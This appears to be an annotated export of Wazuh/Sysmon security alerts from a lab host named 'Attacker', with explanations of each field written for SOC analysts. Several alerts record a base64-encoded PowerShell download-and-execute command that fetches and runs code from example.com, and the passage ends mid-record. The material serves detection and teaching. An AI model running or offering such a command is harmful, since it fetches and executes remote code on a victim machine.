No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:33.276
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:04.060+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.060+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1207619
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:35.2004628Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282896
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:35.096 ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ProcessId: 9396 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_loeo3cho.3ts.ps1 CreationUtcTime: 2025-04-24 22:36:35.096 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:35.096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_loeo3cho.3ts.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:35.096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:04.713+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.713+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1210384
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:37.6992031Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43836
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.033+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.033+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1217719
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:39.0226447Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282962
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:36.380 ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ProcessId: 14892 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ParentProcessId: 9396 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:36.380
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.111+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.111+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1225786
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:39.2679536Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282973
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
